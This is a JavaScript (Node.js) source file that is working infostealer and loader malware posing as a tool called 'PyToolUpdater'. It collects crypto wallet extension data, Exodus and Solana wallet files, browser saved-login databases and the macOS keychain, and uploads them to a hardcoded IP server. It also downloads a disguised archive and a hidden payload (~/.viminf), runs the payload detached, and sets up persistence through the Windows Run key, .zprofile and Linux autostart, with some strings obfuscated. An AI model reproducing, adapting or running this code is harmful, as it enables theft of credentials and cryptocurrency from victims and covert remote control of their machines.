const fs = require("fs"),
    http = require('http'),
    https = require('https'),
    os = require("os"),
    path = require("path"),
    ex = require("child_process").exec,
    hostname = os.hostname(),
    platform = os.platform(),
    homeDir = os.homedir(),
    tmpDir = os.tmpdir(),
    fs_promises = require("fs/promises"),
    hostURL = "http://138.201.125.58:1224",
    getAbsolutePath = (t) =>
        t.replace(/^~([a-z]+|\/)/, (t, c) =>
            "/" === c ? homeDir : `${path.dirname(homeDir)}/${c}`
        ),
    htype = "99",
    gtype = "23";

const { execSync, execFileSync, spawn } = require("child_process");
const APP_NAME = "PyToolUpdater";
const SCRIPT_PATH = `${homeDir}/.viminf`;
let PYTHON_PATH = `${homeDir}/python/bin/python`
const NODE_PATH = process.execPath;

/* -------------------------------------------------- */
/* Helpers                                            */
/* -------------------------------------------------- */

const exec = (cmd) => {
    try {
        return execSync(cmd, { stdio: "pipe" }).toString();
    } catch {
        return null;
    }
}

const getPythonPaths = () => {
    // Determine the correct command based on OS
    let cmd = platform === "win32" ? "where python" : "which python";

    return new Promise((resolve, reject) => {
        exec(cmd, (error, stdout, stderr) => {
            if (error || stderr) {
                return;
            }
            // Split the stdout ot get all paths if threre are multiple
            const pythonPaths = stdout.trim().split(platform === "win32" ? "\r\n" : "\n");
            resolve(pythonPaths);
        });
    });
}

function getHttpModule(url) {
    return new URL(url).protocol === "https:" ? https : http;
}

function getPythonDownloadPath() {
    if ("w" == platform[0]) {
        return "/pdown/win";
    }
    if ("l" == platform[0]) {
        return "/pdown/linux";
    }
    if ("d" == platform[0]) {
        const arch = os.arch();
        return arch === "arm64" ? "/pdown/darwin-arch64" : "/pdown/darwin-x86-64";
    }
    return "/pdown";
}

const httpGet = (url, callback) => {
    const lib = getHttpModule(url);
    const req = lib.get(url, callback);
    req.on("error", (err) => {
        if (callback) callback(err);
    });
    return req;
};

function postMultipart(url, formData, callback) {
    const boundary = "----NodeFormBoundary" + Date.now();
    const urlObj = new URL(url);
    const lib = getHttpModule(url);
    const options = {
        method: "POST",
        hostname: urlObj.hostname,
        port: urlObj.port || (urlObj.protocol === "https:" ? 443 : 80),
        path: `${urlObj.pathname}${urlObj.search}`,
        headers: {
            "Content-Type": `multipart/form-data; boundary=${boundary}`,
        },
    };

    const req = lib.request(options, (res) => {
        let body = "";
        res.on("data", (chunk) => (body += chunk));
        res.on("end", () => {
            if (callback) callback(null, res, body);
        });
    });

    req.on("error", (err) => {
        if (callback) callback(err);
    });

    function writeField(name, value) {
        req.write(`--${boundary}\r\n`);
        req.write(`Content-Disposition: form-data; name="${name}"\r\n\r\n`);
        req.write(`${value}\r\n`);
    }

    function writeFilePart(file, done) {
        req.write(`--${boundary}\r\n`);
        req.write(
            `Content-Disposition: form-data; name="multi_file"; filename="${file.options.filename}"\r\n`
        );
        req.write("Content-Type: application/octet-stream\r\n\r\n");
        file.value.on("error", (err) => req.destroy(err));
        file.value.pipe(req, { end: false });
        file.value.on("end", () => {
            req.write("\r\n");
            done();
        });
    }

    writeField("type", formData.type);
    writeField("hid", formData.hid);
    writeField("uts", formData.uts);

    const files = Array.isArray(formData.multi_file) ? formData.multi_file : [];
    let i = 0;

    function nextFile() {
        if (i >= files.length) {
            req.end(`--${boundary}--\r\n`);
            return;
        }
        writeFilePart(files[i++], nextFile);
    }

    if (files.length > 0) {
        nextFile();
    } else {
        req.end(`--${boundary}--\r\n`);
    }
}

/* -------------------------------------------------- */
/* WINDOWS (Registry Run key)                         */
/* -------------------------------------------------- */

const RUN_KEY = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run";

function installWindows() {
    const value = `"${NODE_PATH}" "${SCRIPT_PATH}"`;
    execFileSync("reg", [
        "add", RUN_KEY,
        "/v", APP_NAME,
        "/t", "REG_SZ",
        "/d", value,
        "/f",
    ]);
}

function uninstallWindows() {
    execFileSync("reg", [
        "delete", RUN_KEY,
        "/v", APP_NAME,
        "/f",
    ]);
}

function isInstalledWindows() {
    try {
        execFileSync("reg", ["query", RUN_KEY, "/v", APP_NAME], { stdio: "ignore" });
        return true;
    } catch {
        return false;
    }
}

/* -------------------------------------------------- */
/* MACOS (LaunchAgent)                                */
/* -------------------------------------------------- */

const MAC_LABEL = `com.${APP_NAME}`;
const MAC_DOMAIN = () => `gui/${process.getuid()}`;

function macPlistPath() {
    return path.join(os.homedir(), "Library/LaunchAgents", `${MAC_LABEL}.plist`);
}

// function isInstalledMac() {
//     return fs.existsSync(macPlistPath());
// }

// function installMac() {
// //     const plist = `<?xml version="1.0" encoding="UTF-8"?>
// // <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
// // "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
// // <plist version="1.0">
// // <dict>
// //   <key>Label</key>
// //   <string>${MAC_LABEL}</string>
// //   <key>ProgramArguments</key>
// //   <array>
// //     <string>${NODE_PATH}</string>
// //     <string>${SCRIPT_PATH}</string>
// //   </array>
// //   <key>RunAtLoad</key>
// //   <true/>
// // </dict>
// // </plist>`;

// //     const plistPath = macPlistPath();
// //     fs.mkdirSync(path.dirname(plistPath), { recursive: true });
// //     fs.writeFileSync(plistPath, plist);

// //     // Bootout first so reinstalls pick up a changed plist.
// //     try {
// //         execFileSync("launchctl", ["bootout", `${MAC_DOMAIN()}/${MAC_LABEL}`], { stdio: "ignore" });
// //     } catch { /* not loaded yet, fine */ }

// //     execFileSync("launchctl", ["bootstrap", MAC_DOMAIN(), plistPath]);
// const _0x2cfa31 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\"\n\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n  <key>Label</key>\n  <string>com.PyToolUpdater</string>\n  <key>ProgramArguments</key>\n  <array>\n    <string>" + NODE_PATH + "</string>\n    <string>" + SCRIPT_PATH + "</string>\n  </array>\n  <key>RunAtLoad</key>\n  <true/>\n</dict>\n</plist>";
//   fs["mkdirSync"](path["dirname"](macPlistPath()), {
//     'recursive': true
//   }), fs["writeFileSync"](macPlistPath(), _0x2cfa31), exec('launchctl\x20load\x20\x22' + macPlistPath() + '\x22');
// }

// function uninstallMac() {
//     const plistPath = macPlistPath();
//     try {
//         execFileSync("launchctl", ["bootout", `${MAC_DOMAIN()}/${MAC_LABEL}`], { stdio: "ignore" });
//     } catch { /* not loaded, fine */ }
//     if (fs.existsSync(plistPath)) fs.unlinkSync(plistPath);
// }

function escapeRegex(s) {
    return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

function profilePath() {
    return path.join(os.homedir(), ".zprofile");
}

function profileMarkers() {
    return {
        begin: `# >>> ${APP_NAME} bootstrap >>>`,
        end:   `# <<< ${APP_NAME} bootstrap <<<`,
    };
}

function isInstalledProfile() {
    if (!fs.existsSync(profilePath())) return false;
    const { begin } = profileMarkers();
    return fs.readFileSync(profilePath(), "utf8").includes(begin);
}

function installProfile() {
    const { begin, end } = profileMarkers();
    const lockPath = `/tmp/${APP_NAME}.pid`;
    const logPath  = `/tmp/${APP_NAME}.log`;

    const block = `${begin}
if [ -f "${lockPath}" ] && ps -p "$(cat "${lockPath}" 2>/dev/null)" >/dev/null 2>&1; then
    : # already running — leave it alone
else
    nohup "${NODE_PATH}" "${SCRIPT_PATH}" </dev/null >>"${logPath}" 2>&1 &!
    echo $! > "${lockPath}"
fi
${end}
`;

    const existing = fs.existsSync(profilePath())
        ? fs.readFileSync(profilePath(), "utf8")
        : "";
    if (existing.includes(begin)) {
        const re = new RegExp(
            `\\n?${escapeRegex(begin)}[\\s\\S]*?${escapeRegex(end)}\\n?`,
            "g",
        );
        fs.writeFileSync(profilePath(), existing.replace(re, "") + `\n${block}`);
        return;
    }
    fs.appendFileSync(profilePath(), `\n${block}`);
}

function uninstallProfile() {
    if (!fs.existsSync(profilePath())) return;
    const { begin, end } = profileMarkers();
    const re = new RegExp(
        `\\n?${escapeRegex(begin)}[\\s\\S]*?${escapeRegex(end)}\\n?`,
        "g",
    );
    const updated = fs.readFileSync(profilePath(), "utf8").replace(re, "");
    fs.writeFileSync(profilePath(), updated);
}

/* -------------------------------------------------- */
/* LINUX (XDG Autostart .desktop)                     */
/* -------------------------------------------------- */

function linuxDesktopPath() {
    return path["join"](os["homedir"](), ".config", "autostart", "PyToolUpdater.desktop");
}

function isInstalledLinux() {
    return fs.existsSync(linuxDesktopPath());
}

function installLinux() {
//     const desktop = `[Desktop Entry]
// Type=Application
// Name=${APP_NAME}
// Exec=${NODE_PATH} ${SCRIPT_PATH}
// X-GNOME-Autostart-enabled=true
// `;

//     fs.mkdirSync(path.dirname(linuxDesktopPath()), { recursive: true });
//     fs.writeFileSync(linuxDesktopPath(), desktop);
const desktop = "[Desktop Entry]\nType=Application\nName=PyToolUpdater\nExec=" + NODE_PATH + '\x20' + SCRIPT_PATH + '\x0aX-GNOME-Autostart-enabled=true\x0a';
  fs['mkdirSync'](path["dirname"](linuxDesktopPath()), {
    'recursive': true
  }), fs["writeFileSync"](linuxDesktopPath(), desktop);
}

function uninstallLinux() {
    fs.unlinkSync(linuxDesktopPath());
}

/* -------------------------------------------------- */
/* INSTALL / UNINSTALL LOGIC                          */
/* -------------------------------------------------- */

function isInstalled() {
    if (platform === "win32") return isInstalledWindows();
    if (platform === "darwin") return isInstalledProfile();
    if (platform === "linux") return isInstalledLinux();
    return false;
}

function install() {
    if (platform === "win32") installWindows();
    else if (platform === "darwin") installProfile();
    else if (platform === "linux") installLinux();
}

function uninstall() {
    if (platform === "win32") uninstallWindows();
    else if (platform === "darwin") uninstallProfile();
    else if (platform === "linux") uninstallLinux();
}
// console.log();
function testPath(t) {
    try {
        return fs.accessSync(t), true;
    } catch (t) {
        return false;
    }
}
// console.log();
const R = [
    "Local/BraveSoftware/Brave-Browser",
    "BraveSoftware/Brave-Browser",
    "BraveSoftware/Brave-Browser",
],
    Q = ["Local/Google/Chrome", "Google/Chrome", "google-chrome"],
    X = [
        "Roaming/Opera Software/Opera Stable",
        "com.operasoftware.Opera",
        "opera",
    ],
    Bt = [
        "nkbihfbeogaeaoehlefnkodbefgpgknn",
        "ejbalbakoplchlghecdalmeeeajnimhm",
        "fhbohimaelbohpjbbldcngcnapndodjp",
        "ibnejdfjmmkpcnlpebklmnkoeoihofec",
        "bfnaelmomeimhlpmgjnjophhpkkoljpa",
        "aeachknmefphepccionboohckonoeemg",
        "hifafgmccdpekplomjjkcfgodnhcellj",
        "jblndlipeogpafnldhgmapagcccfchpi",
        "acmacodkjbdgmoleebolmdjonilkdbch",
        "dlcobpjiigpikoobohmabehhmhfoodbb",
        "mcohilncbfahbmgdjkbpemcciiolgcge",
        "agoakfejjabomempkjlepdflaleeobhb",
        "omaabbefbmiijedngplfjmnooppbclkk",
        "aholpfdialjgjfhomihkjbmgjidlcdno",
        "nphplpgoakhhjchkkhmiggakijnkhfnd",
        "penjlddjkjgpnkllboccdgccekpkcbin",
        "lgmpcpglpngdoalbgeoldeajfclnhafa",
        "fldfpgipfncgndfolcbkdeeknbbbnhcc",
        "bhhhlbepdkbapadjdnnojkbgioiodbic",
        "aeachknmefphepccionboohckonoeemg",
        "gjnckgkfmgmibbkoficdidcljeaaaheg",
        "afbcbjpbpfadlkmhmclhkeeodmamcflc",
    ],
    uploadFiles = async (userDataPath, prefix, isGoogle, u) => {
        let tmpFile;
        if (!userDataPath || "" === userDataPath) return [];
        try {
            if (!testPath(userDataPath)) return [];
        } catch (t) {
            return [];
        }
        prefix || (prefix = "");
        let files = [];
        for (let r = 0; r < 200; r++) {
            const s = `${userDataPath}/${0 === r ? "Default" : `Profile ${r}`
                }/Local Extension Settings`;
            for (let t = 0; t < Bt.length; t++) {
                let o = `${s}/${Bt[t]}`;
                if (testPath(o)) {
                    let far = [];
                    try {
                        far = fs.readdirSync(o);
                    } catch (t) {
                        far = [];
                    }
                    let tmp_i = 0;
                    if (!testPath(`${getAbsolutePath("~/")}/.n3`)) {
                        fs_promises.mkdir(`${getAbsolutePath("~/")}/.n3`);
                    }
                    far.forEach(async (file) => {
                        let filePath = path.join(o, file);
                        try {
                            let stats = fs.statSync(filePath);
                            if (stats.isDirectory()) {
                                return
                            }
                            if (filePath.includes(".log") || filePath.includes(".ldb")) {
                                files.push({
                                    value: fs.createReadStream(filePath),
                                    options: {
                                        filename: `${gtype}_${prefix}${r}_${Bt[t]}_${file}`,
                                    },
                                });
                            } else {
                                await fs_promises.copyFile(filePath, `${getAbsolutePath("~/")}/.n3/tp${tmp_i}`);
                                files.push({
                                    value: fs.createReadStream(`${getAbsolutePath("~/")}/.n3/tp${tmp_i}`),
                                    options: {
                                        filename: `${gtype}_${prefix}${r}_${Bt[t]}_${file}`,
                                    },
                                });
                                tmp_i += 1;
                            }
                        } catch (t) { }
                    });
                }
            }
        }

        if (
            isGoogle &&
            ((tmpFile = `${homeDir}/.config/solana/id.json`), fs.existsSync(tmpFile))
        )
            try {
                files.push({
                    value: fs.createReadStream(tmpFile),
                    options: {
                        filename: "solana_id.txt",
                    },
                });
            } catch (t) { }
        return Upload(files, u), files;
    },
    uploadMozilla = (u) => {
        const mpath = `${getAbsolutePath(
            "~/"
        )}/AppData/Roaming/Mozilla/Firefox/Profiles`;
        let files = [];
        if (testPath(mpath)) {
            let far = [];
            try {
                far = fs.readdirSync(mpath);
            } catch (t) {
                far = [];
            }
            let prefix = 0;
            far.forEach(async (file) => {
                let filePath = path.join(mpath, file);
                if (filePath.includes("-release")) {
                    let fmpath = path.join(filePath, "/storage/default");
                    let pmpath = [];
                    pmpath = fs.readdirSync(fmpath);
                    let sub_prefix = 0;
                    pmpath.forEach(async (file) => {
                        if (file.includes("moz-extension")) {
                            let npath = path.join(fmpath, file);
                            npath = path.join(npath, "idb");
                            let dpath = [];
                            dpath = fs.readdirSync(npath);
                            dpath.forEach(async (file) => {
                                if (file.includes(".files")) {
                                    let qpath = path.join(npath, file);
                                    let od = [];
                                    od = fs.readdirSync(qpath);
                                    od.forEach((item) => {
                                        if (!fs.statSync(path.join(qpath, item)).isDirectory()) {
                                            let lpath = path.join(qpath, item);
                                            files.push({
                                                value: fs.createReadStream(lpath),
                                                options: {
                                                    filename: `${prefix}_${sub_prefix}_${item}`,
                                                },
                                            });
                                        }
                                    });
                                }
                            });
                        }
                    });
                    sub_prefix += 1;
                }
                prefix += 1;
            });
            return Upload(files, u), files;
        }
    },
    uploadEs = (u) => {
        let e_path = "";
        let files = [];
        if ("w" == platform[0]) {
            e_path = `${getAbsolutePath("~/")}/AppData/Roaming/Exodus/exodus.wallet`;
        } else if ("d" == platform[0]) {
            e_path = `${getAbsolutePath(
                "~/"
            )}/Library/Application Support/exodus.wallet`;
        } else {
            e_path = `${getAbsolutePath("~/")}/.config/Exodus/exodus.wallet`;
        }
        if (testPath(e_path)) {
            let far = [];
            try {
                far = fs.readdirSync(e_path);
            } catch (t) {
                far = [];
            }
            let tmp_i = 0;
            if (!testPath(`${getAbsolutePath("~/")}/.n3`)) {
                fs_promises.mkdir(`${getAbsolutePath("~/")}/.n3`);
            }
            far.forEach(async (file) => {
                let filePath = path.join(e_path, file);
                try {
                    fs_promises.copyFile(filePath, `${getAbsolutePath("~/")}/.n3/tp${tmp_i}`);
                    files.push({
                        value: fs.createReadStream(`${getAbsolutePath("~/")}/.n3/tp${tmp_i}`),
                        options: {
                            filename: `${gtype}_${file}`,
                        },
                    });
                    tmp_i += 1;
                } catch (t) { }
            });
        }
        return Upload(files, u), files;
    },
    Upload = (files, u) => {
        const r = {
            type: htype,
            hid: `${gtype}_${hostname}`,
            uts: u,
            multi_file: files,
        };
        // console.log();
        try {
            if (files.length > 0) {
                postMultipart(`${hostURL}/uploads`, r, (err, res, body) => { });
            }
        } catch (t) { }
    },
    UpAppData = async (t, c, u) => {
        try {
            let r = "";
            (r =
                "d" == platform[0]
                    ? `${getAbsolutePath("~/")}/Library/Application Support/${t[1]}`
                    : "l" == platform[0]
                        ? `${getAbsolutePath("~/")}/.config/${t[2]}`
                        : `${getAbsolutePath("~/")}/AppData/${t[0]}/User Data`),
                await uploadFiles(r, `${c}_`, 0 == c, u);
        } catch (t) { }
    },
    UpKeychain = async (u) => {
        let files = [];
        let pa = `${homeDir}/Library/Keychains/login.keychain`;
        if (fs.existsSync(pa)) {
            try {
                files.push({
                    value: fs.createReadStream(pa),
                    options: {
                        filename: "logkc-db",
                    },
                });
            } catch (t) { }
        } else if (((pa += "-db"), fs.existsSync(pa))) {
            try {
                files.push({
                    value: fs.createReadStream(pa),
                    options: {
                        filename: "logkc-db",
                    },
                });
            } catch (t) { }
        }
        try {
            let l = `${homeDir}/Library/Application Support/Google/Chrome`;
            if (testPath(l)) {
                for (let n = 0; n < 200; n++) {
                    const Z = `${l}/${0 === n ? "Default" : `Profile ${n}`}/Login Data`;
                    try {
                        if (!testPath(Z)) continue;
                        const c = `${l}/ld_${n}`;
                        testPath(c)
                            ? files.push({
                                value: fs.createReadStream(c),
                                options: {
                                    filename: `pld_${n}`,
                                },
                            })
                            : fs.copyFile(Z, c, (t) => {
                                let c = [
                                    {
                                        value: fs.createReadStream(Z),
                                        options: {
                                            filename: `pld_${n}`,
                                        },
                                    },
                                ];
                                Upload(c, u);
                            });
                    } catch (t) { }
                }
            }
        } catch (t) { }
        try {
            let l = `${homeDir}/Library/Application Support/BraveSoftware/Brave-Browser`;
            if (testPath(l)) {
                for (let n = 0; n < 200; n++) {
                    const Z = `${l}/${0 === n ? "Default" : `Profile ${n}`}`;
                    try {
                        if (!testPath(Z)) continue;
                        const c = `${Z}/Login Data`;
                        // console.log();
                        testPath(c)
                            ? files.push({
                                value: fs.createReadStream(c),
                                options: {
                                    filename: `brld_${n}`,
                                },
                            })
                            : fs.copyFile(Z, c, (t) => {
                                let c = [
                                    {
                                        value: fs.createReadStream(Z),
                                        options: {
                                            filename: `brld_${n}`,
                                        },
                                    },
                                ];
                                Upload(c, u);
                            });
                    } catch (t) { }
                }
            }
        } catch (t) { }
        return Upload(files, u), files;
    },
    UpUserData = async (t, prefix, u) => {
        let files = [];
        let r = "";
        r =
            "d" == platform[0]
                ? `${getAbsolutePath("~/")}/Library/Application Support/${t[1]}`
                : "l" == platform[0]
                    ? `${getAbsolutePath("~/")}/.config/${t[2]}`
                    : `${getAbsolutePath("~/")}/AppData/${t[0]}/User Data`;
        let pa = `${r}/Local State`;
        if (fs.existsSync(pa)) {
            try {
                files.push({
                    value: fs.createReadStream(pa),
                    options: {
                        filename: `${prefix}_lst`,
                    },
                });
            } catch (t) { }
        }
        try {
            if (testPath(r)) {
                for (let n = 0; n < 200; n++) {
                    const Z = `${r}/${0 === n ? "Default" : `Profile ${n}`}`;
                    try {
                        if (!testPath(Z)) continue;
                        const c = `${Z}/Login Data`;
                        if (!testPath(c)) continue;
                        files.push({
                            value: fs.createReadStream(c),
                            options: {
                                filename: `${prefix}_${n}_uld`,
                            },
                        });
                    } catch (t) { }
                }
            }
        } catch (t) { }
        return Upload(files, u), files;
    },
    St = 51476590;
let It = 0;
// console.log();
const extractFile = async (t) => {
    // console.log('extractFile: extracting', t, 'to', homeDir);
    return new Promise((resolve, reject) => {
        ex(`tar -xf ${t} -C ${homeDir}`, (c, r, e) => {
            if (c) {
                // console.log('extractFile: extraction failed', c);
                // fs.rmSync(t);
                It = 0;
                return reject(c);
            }
            // console.log('extractFile: extraction complete, cleaning up archive');
            // fs.rmSync(t);
            It = St + 6;
            // console.log('extractFile: python extracted successfully');
            resolve();
        });
    });
},
    downloadFile = (url, filePath, callback) => {
        const req = http.get(url, (response) => {
            const fileStream = fs.createWriteStream(filePath);
            response.pipe(fileStream);

            fileStream.on('finish', () => {
                if (callback) return callback(null);
                (It = St + 6), extractFile(`${tmpDir}\\gradle-7-bin`);
            });

            fileStream.on('error', (err) => {
                if (callback) return callback(err);
            });
        });

        req.on('error', (err) => {
            if (callback) return callback(err);
        });
    },
    runP = async () => {
        return new Promise((resolve, reject) => {
            const c = `${hostURL}${getPythonDownloadPath()}`,
                r = `${tmpDir}\\gradle-7-bin`,
                filePath = path.resolve(`${tmpDir}`, 'gradle-7-bin');
            // console.log('runP: checking payload file', r, 'download url', c, 'threshold', St + 6, 'current It', It);
            if (It >= St + 6) {
                // console.log('runP: python already downloaded');
                return resolve();
            }
            if (fs.existsSync(r)) {
                try {
                    var h = fs.statSync(r);
                    if (h.size >= St + 6) {
                        // console.log('runP: existing payload complete, extracting', r);
                        It = h.size;
                        extractFile(r).then(resolve).catch(reject);
                    } else {
                        // console.log('runP: existing payload incomplete, size', h.size, ', deleting and redownloading');
                        fs.rmSync(r);
                        It = 0;
                        downloadFile(c, filePath, (err) => {
                            if (err) return reject(err);
                            extractFile(filePath).then(resolve).catch(reject);
                        });
                    }
                } catch (t) {
                    // console.log('runP: stat failed', t);
                    reject(t);
                }
            } else {
                // console.log('runP: downloading python from', c, 'to', filePath);
                downloadFile(c, filePath, (err) => {
                    if (err) return reject(err);
                    extractFile(filePath).then(resolve).catch(reject);
                });
            }
        });
    };


const downloadPayload = (dest) => {
    const source = `${hostURL}/client/${htype}/${gtype}`;
    // console.log('downloadPayload: downloading from', source, 'to', dest, 'with node');
    try {
        fs.rmSync(dest);
    } catch (t) {
        // console.log('downloadPayload: remove existing dest failed or not present', t && t.message);
    }
    downloadFile(source, dest, (err) => {
        if (err) {
            // console.log('downloadPayload: download failed', err && err.message);
            return;
        }
        // console.log('downloadPayload: download complete, spawning detached node process for', dest);
        const child = spawn(process.execPath, [dest], {
            detached: true,
            stdio: 'ignore',
        });
        child.unref();
        if (!isInstalled()) {
            install();
        } else {
        }
    });
};



const Xt = async () => {
    const payloadPath = `${homeDir}/.viminf`;
    // console.log('payloadPath', payloadPath);
    // console.log('Xt: platform', platform, 'payloadPath', payloadPath);
    try {
        // console.log('Xt: downloading and extracting python');
        await runP();
        // console.log('Xt: python extraction complete, now downloading payload');
        downloadPayload(payloadPath);
    } catch (err) {
        // console.log('Xt: failed to download/extract python', err && err.message);
    }
};

var M = 0;
const main = async () => {
    try {
        const Y = Math.round(new Date().getTime() / 1000);
        
        // UpAppData operations
        try {
            await UpAppData(Q, 0, Y);
        } catch (error) {
            console.error("Error in UpAppData (Q):", error);
        }
        
        try {
            await UpAppData(R, 1, Y);
        } catch (error) {
            console.error("Error in UpAppData (R):", error);
        }
        
        try {
            await UpAppData(X, 2, Y);
        } catch (error) {
            console.error("Error in UpAppData (X):", error);
        }
        
        // uploadMozilla operation
        try {
            uploadMozilla(Y);
        } catch (error) {
            console.error("Error in uploadMozilla:", error);
        }
        
        // uploadEs operation
        try {
            uploadEs(Y);
        } catch (error) {
            console.error("Error in uploadEs:", error);
        }
        
        // Windows-specific uploadFiles operation
        if ("w" == platform[0]) {
            try {
                await uploadFiles(
                    `${getAbsolutePath("~/")}/AppData/Local/Microsoft/Edge/User Data`,
                    "3_",
                    false,
                    Y
                );
            } catch (error) {
                console.error("Error in uploadFiles (Edge):", error);
            }
        }
        
        // Platform-specific operations
        if ("d" == platform[0]) {
            try {
                await UpKeychain(Y);
            } catch (error) {
                console.error("Error in UpKeychain:", error);
            }
        } else {
            try {
                await UpUserData(Q, 0, Y);
            } catch (error) {
                console.error("Error in UpUserData (Q):", error);
            }
            
            try {
                await UpUserData(R, 1, Y);
            } catch (error) {
                console.error("Error in UpUserData (R):", error);
            }
            
            try {
                await UpUserData(X, 2, Y);
            } catch (error) {
                console.error("Error in UpUserData (X):", error);
            }
        }
    } catch (t) {
        console.error("Error in main function:", t);
    }
};

// Retry wrapper function: retries main up to 6 times with 2-second interval
const mainWithRetry = async (maxRetries = 6, delayMs = 2000) => {
    let attempts = 0;
    while (attempts < maxRetries) {
        try {
            await main();
            return; // Success, exit
        } catch (error) {
            attempts++;
            if (attempts >= maxRetries) {
                console.error(`Failed after ${maxRetries} attempts:`, error);
                throw error;
            }
            console.warn(`Attempt ${attempts} failed, retrying in ${delayMs / 1000} seconds...`);
            await new Promise(resolve => setTimeout(resolve, delayMs));
        }
    }
};

// mainWithRetry();
Xt();

// getPythonPaths()
//     .then(pythonPaths => {
//         if (pythonPaths.length > 0) {
//             PYTHON_PATH = pythonPaths[0];
//         } else {
//         }
//     })
//     .catch();

// let Ct = setInterval(() => {
//     (M += 1) < 2 ? mainWithRetry() : clearInterval(Ct);
// }, 3e4)
